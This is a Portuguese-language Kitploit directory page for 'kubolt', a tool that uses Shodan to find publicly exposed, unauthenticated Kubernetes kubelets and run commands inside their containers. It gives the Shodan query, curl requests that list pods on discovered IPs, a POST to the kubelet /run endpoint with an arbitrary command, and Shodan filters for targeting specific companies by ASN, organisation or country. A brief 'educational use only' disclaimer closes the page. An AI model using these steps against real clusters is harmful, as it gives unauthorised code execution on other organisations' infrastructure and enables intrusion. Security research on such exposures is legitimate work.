Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
kubolt — Utilitário Kubolt para escanear clusters Kubernetes públicos | Kitploit
Ferramentas/GitHubGitHub/averonesis/kubolt
OSINT (Inteligência de Fontes Abertas)ReconhecimentoScanners de VulnerabilidadesSegurança de ContêineresSegurança na NuvemConfiguração Incorreta
GitHubaveronesis/kubolt

kubolt

Utilitário Kubolt para escanear clusters Kubernetes públicos

Ver Repositório
11019há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

O quê?

Kubolt é um utilitário simples para escanear clusters Kubernetes públicos não autenticados e executar comandos dentro de contêineres

Por quê?

Às vezes, a porta 10250 do kubelet está aberta para acesso não autorizado e torna possível executar comandos dentro dos contêineres usando a função getrun do kubelet:

root@kitploit:~
// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
	params := getExecRequestParams(request)
	pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
	if !ok {
		response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
		return
	}

Como?

Ok, vamos perguntar ao nosso amigo Shodan :trollface:

A consulta básica é

ssl:true port:10250 404

Kubelet usa a porta 10250 com SSL por padrão, 404 é a resposta HTTP sem caminho de URL.

Kubolt pede ao Shodan via API uma lista de endereços IP e os mantém para outras ações de OSINT 😁

Primeiramente, vamos pedir ao Kubelet os pods em execução e filtrar hosts onde a resposta não contenha Unauthorized e contenha container para que possamos executar comandos dentro dele.

root@kitploit:~
curl -k https://IP-from-Shodan:10250/runningpods/ 

De qualquer forma, se você encontrar o host sem nenhum pod em execução no momento, guarde-o para a próxima vez que os pods possam ser iniciados 😁

Você pode listar todos os pods disponíveis a partir dessas requisições:

root@kitploit:~
curl -k https://IP-from-Shodan:10250/pods/
#or
curl http://IP-from-Shodan:10255/pods/ 

Em seguida, kubolt analisa a resposta e gera uma nova requisição como abaixo:

root@kitploit:~
curl -XPOST -k https://IP-from-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<command-to-run>" 

Você pode segmentar empresas com mais precisão usando filtros do Shodan como:

  • asn
  • org
  • country
  • net

Instalação

root@kitploit:~
mkdir output
pip install -r requirements.txt 

Execução

root@kitploit:~
python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#or
python kubolt.py --query "org:'ACME Corporation' country:UK"

Shodan

Kubolt usa a API do Shodan e Créditos de Consulta de acordo, se você executar a ferramenta sem filtros de consulta, provavelmente queimará todos os seus créditos ¯\_(ツ)_/¯

Demonstração

Demonstração

Importante

A ferramenta fornecida pelo autor deve ser usada apenas para fins educacionais. O autor não pode ser responsabilizado pelo uso indevido da ferramenta. O autor não é responsável por quaisquer danos diretos ou indiretos causados pelo uso da ferramenta.

Baixar ferramenta